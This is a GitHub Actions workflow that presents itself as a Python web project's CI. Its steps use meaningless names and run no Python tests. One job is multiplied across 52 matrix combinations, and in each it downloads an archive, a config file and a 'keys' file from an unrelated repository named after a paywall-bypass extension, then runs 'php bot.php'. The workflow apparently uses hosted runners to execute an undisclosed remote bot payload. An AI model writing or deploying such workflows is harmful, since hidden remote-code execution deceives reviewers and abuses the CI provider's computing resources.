# This is a basic workflow to help you get started with Actions

# ------------------------------------ #
#       Made By An V.1.0.0           #
# ------------------------------------ #
name: My Python Web
# ------------------------------------ #
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
# ------------------------------------ #
jobs:
  bkjs:
    runs-on: ubuntu-20.04
    strategy:
      matrix:
        testi: [1]
        flaga: [Aqw]
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runneyr_go
      run: |
        sudo apt update -y && sleep 5
        
  ipsjrt-linux:
    needs: [bkjs]
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: [3.9, 3.8, 3.7, 3.6]
        check: [tes, hus, is, 2hd, uw8e, uis, 8ww, uuw, 92r, 9wjw, lops, 5w8, hs,]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}
    - name: EBroo maov .
      run: |
        sudo apt update
        sudo apt install php -y
        wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip
        unzip frth.zip
        wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/config.json
        wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys
        php bot.php
